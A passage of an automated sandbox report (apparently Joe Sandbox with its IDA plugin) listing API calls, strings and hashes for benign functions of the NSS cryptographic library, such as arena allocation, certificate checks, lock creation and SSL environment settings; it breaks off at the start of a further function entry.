Function 6C57DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C57DDDE

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C57DDF5

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C57DE34
PR_Now.NSS3 ref: 6C57DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C57DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C57DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C57DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C57DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C57DEF0
PR_smprintf.NSS3(6C6AAAF9,(NULL) (Validity Unknown)), ref: 6C57DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C57DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C57DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C57DF33
free.MOZGLUE(00000000), ref: 6C57DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C57DF4B
free.MOZGLUE(00000000), ref: 6C57DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C57DF8E

Strings

(NULL) (Validity Unknown), xrefs: 6C57DEFA
{???}, xrefs: 6C57DE8B
%s%s, xrefs: 6C57DEEB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 3cba11dc7b182fb9ddd6840af957448db51da4b51d2751d6a089af824b863841
Instruction ID: 685929980ae66cb2f02a313dd1c4fe5dfb5b9835734d0489470e667e47fbbaab
Opcode Fuzzy Hash: 3cba11dc7b182fb9ddd6840af957448db51da4b51d2751d6a089af824b863841
Instruction Fuzzy Hash: CC51B1B1E002019BDB20DE659C41AAF7AF5AF95358F144029EC09E7701E731ED55CBF6

Function 6C5B2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C5B2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C5B2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5B2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5B2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C584F1C,?,-00000001,00000000,?), ref: 6C5B2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C584F1C,?,-00000001,00000000), ref: 6C5B2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5B2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5B2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5B2EF8
PR_Unlock.NSS3(?), ref: 6C5B2F62
TlsGetValue.KERNEL32 ref: 6C5B2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5B2F9E
PR_Unlock.NSS3(?), ref: 6C5B2FCA
TlsGetValue.KERNEL32 ref: 6C5B301A
EnterCriticalSection.KERNEL32(?), ref: 6C5B302E
PR_Unlock.NSS3(?), ref: 6C5B3066
PR_SetError.NSS3(00000000,00000000), ref: 6C5B3085
PR_Unlock.NSS3(?), ref: 6C5B30EC
TlsGetValue.KERNEL32 ref: 6C5B310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5B3124
PR_Unlock.NSS3(?), ref: 6C5B314C

Part of subcall function 6C599180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C5C379E,?,6C599568,00000000,?,6C5C379E,?,00000001,?), ref: 6C59918D
Part of subcall function 6C599180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C5C379E,?,6C599568,00000000,?,6C5C379E,?,00000001,?), ref: 6C5991A0

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

PR_SetError.NSS3(00000000,00000000), ref: 6C5B316D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 4b3f78e59eda28b03cc38eaf8a2b125958840a8fcab7d365d906b0678cc353a7
Instruction ID: 13eec744756b37adff8a0d1688bacf114dc9134732e25c057758d21b703b65a6
Opcode Fuzzy Hash: 4b3f78e59eda28b03cc38eaf8a2b125958840a8fcab7d365d906b0678cc353a7
Instruction Fuzzy Hash: 08F199B5D00208AFDF00DF69DC95AAABBB4BF09318F144169EC05B7B11EB31E995CB91

Function 6C599FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C599FBE

Part of subcall function 6C572F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C572F0A
Part of subcall function 6C572F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C572F1D

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C59A015

Part of subcall function 6C5B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C5B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C5B195C
Part of subcall function 6C5B1940: EnterCriticalSection.KERNEL32(?,?,6C5B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C58EAC5,00000001), ref: 6C5B1970
Part of subcall function 6C5B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C58EAC5,00000001,?,6C58CE9B,00000001,6C58EAC5), ref: 6C5B19A0

PL_FreeArenaPool.NSS3(?), ref: 6C59A067
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C59A055

Part of subcall function 6C4F4C70: TlsGetValue.KERNEL32(?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4C97
Part of subcall function 6C4F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CB0
Part of subcall function 6C4F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CC9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59A07E
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C59A0B1
PL_FreeArenaPool.NSS3(?), ref: 6C59A0C7
PL_FinishArenaPool.NSS3(?), ref: 6C59A0CF
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C59A12E
PL_FreeArenaPool.NSS3(?), ref: 6C59A140
PL_FinishArenaPool.NSS3(?), ref: 6C59A148
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59A158
PL_FinishArenaPool.NSS3(?), ref: 6C59A175
CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C59A1A5
CERT_DestroyCertificate.NSS3(00000000), ref: 6C59A1B2
free.MOZGLUE(00000000), ref: 6C59A1C6
CERT_DestroyCertList.NSS3(00000000), ref: 6C59A1D6

Part of subcall function 6C5B55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C58EAC5,00000001,?,6C58CE9B,00000001,6C58EAC5,00000003,-00000004,00000000,?,6C58EAC5), ref: 6C5B5627
Part of subcall function 6C5B55E0: PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0,?,?,?,?,?,?,?,?,?,?,6C58EAC5,00000001,?,6C58CE9B), ref: 6C5B564F
Part of subcall function 6C5B55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C58EAC5,00000001), ref: 6C5B5661
Part of subcall function 6C5B55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C58EAC5), ref: 6C5B56AF

Strings

security, xrefs: 6C59A00F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
String ID: security
API String ID: 3250630715-3315324353
Opcode ID: bdcfd94e58ed48e526d09f6edd8a2d59bae2af59a97471f7c39a6023c26ae311
Instruction ID: d0669bf0e30d1b39b0ebc8ba6ad1de4a39cc215e093d13ced3bf4ef25e0f6345
Opcode Fuzzy Hash: bdcfd94e58ed48e526d09f6edd8a2d59bae2af59a97471f7c39a6023c26ae311
Instruction Fuzzy Hash: A151F771D00349ABEB10CBA9DC85FAF7378AF8130CF150564E805AAB41EB35E909D7B6

Function 6C5A6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C5A6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A6DC3

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5A6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5A6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C5A6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C5A6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C5A6EB9

Strings

pData = 0x%p, xrefs: 6C5A6DF5
ulDataLen = %d, xrefs: 6C5A6E0E
pulDigestLen = 0x%p, xrefs: 6C5A6E42
*pulDigestLen = 0x%x, xrefs: 6C5A6EB4
nhl, xrefs: 6C5A6E61, 6C5A6E95
hSession = 0x%x, xrefs: 6C5A6D9E, 6C5A6DAE
pDigest = 0x%p, xrefs: 6C5A6E27
(CK_INVALID_HANDLE), xrefs: 6C5A6DBC
C_Digest, xrefs: 6C5A6D81

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nhl
API String ID: 1003633598-2612008880
Opcode ID: 722dffc952f2922438a278aec4763811b88b144053c15ecc518397e813110b38
Instruction ID: 5cdb916984b419ea97ffe49e0464aa2b4bc50fddbc65fd378fd0966d42e134f9
Opcode Fuzzy Hash: 722dffc952f2922438a278aec4763811b88b144053c15ecc518397e813110b38
Instruction Fuzzy Hash: DD41D635602115EFDB00DF9ADC88E9E7BB1ABC6718F048455E90897A11DB31EC49CFAD

Function 6C5B4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5B4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C5B4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C5B4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4DB7

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

TlsGetValue.KERNEL32 ref: 6C5B4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C5B4DEC
PR_Unlock.NSS3(?), ref: 6C5B4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C5B4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C5B4E71
free.MOZGLUE(00000000), ref: 6C5B4E7A
PR_Unlock.NSS3(?), ref: 6C5B4EA2
TlsGetValue.KERNEL32 ref: 6C5B4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C5B4ED6
PR_Unlock.NSS3(?), ref: 6C5B4F01
free.MOZGLUE(00000000), ref: 6C5B4F2A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: ad3882e38a7916c433a52acf761d5be8384f3a51c259cc8d953f39339b5ec8d9
Instruction ID: d1015df58b673b60a408ae783a1e0e35e34224ead15264b336dec27a308fe6fa
Opcode Fuzzy Hash: ad3882e38a7916c433a52acf761d5be8384f3a51c259cc8d953f39339b5ec8d9
Instruction Fuzzy Hash: A6B11475E00205AFDB11DF69DC94AAA7BB4BF46318F044128ED05A7B01EB34E964CBD6

Function 6C5BFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5BFFB4

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5BFFC6

Part of subcall function 6C6398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C639946
Part of subcall function 6C6398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F16B7,00000000), ref: 6C63994E
Part of subcall function 6C6398D0: free.MOZGLUE(00000000), ref: 6C63995E

PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5BFFD6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5BFFE6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5BFFF6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0006
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0016
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0026
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0036
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0046
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0056
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0066
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0076
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0086
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C0096
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C00A6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C00B6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C00C6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C00D6
PR_NewLock.NSS3(?,?,6C5B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5C00E6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: 2480b1ad7da75765fe8398c2430b5e681729210581325b09be41bb43d1be8649
Instruction ID: e344151a14474bf9881c0f03f9ae42e8ebd2ace548d6ca936a0ef98f1f52c162
Opcode Fuzzy Hash: 2480b1ad7da75765fe8398c2430b5e681729210581325b09be41bb43d1be8649
Instruction Fuzzy Hash: 3631F2F0E016249E8B85DF27C1C81893BB4BF5BA0AF11651BD91887700DBB4294ACFDD

Function 6C606E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C606BF7), ref: 6C606EB6

Part of subcall function 6C561240: TlsGetValue.KERNEL32(00000040,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561267
Part of subcall function 6C561240: EnterCriticalSection.KERNEL32(?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C56127C
Part of subcall function 6C561240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561291
Part of subcall function 6C561240: PR_Unlock.NSS3(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C5612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C6AFC0A,6C606BF7), ref: 6C606ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C606EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C606EFC
PR_NewLock.NSS3 ref: 6C606F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C606F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C606BF7), ref: 6C606F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C606BF7), ref: 6C606F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C606BF7), ref: 6C606FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C606BF7), ref: 6C606FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6C606FF8
SSLKEYLOGFILE, xrefs: 6C606EB1
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C606EF7
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C606F4F
SSLFORCELOCKS, xrefs: 6C606F2B
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C606FDB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 74f95d40cf93dbd775f9ae72dd518858ca2334fdb05daafaefedf51826079803
Instruction ID: 6d5d74612e4059789b8714147472fbe88772e6d9ec28bca3fd4e50b998ae4670
Opcode Fuzzy Hash: 74f95d40cf93dbd775f9ae72dd518858ca2334fdb05daafaefedf51826079803
Instruction Fuzzy Hash: A4A12AB2B5998086F71C4A3ECE4139433E2AB93329F584369ED31D7ED4DB75E880864D

Function 6C585DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

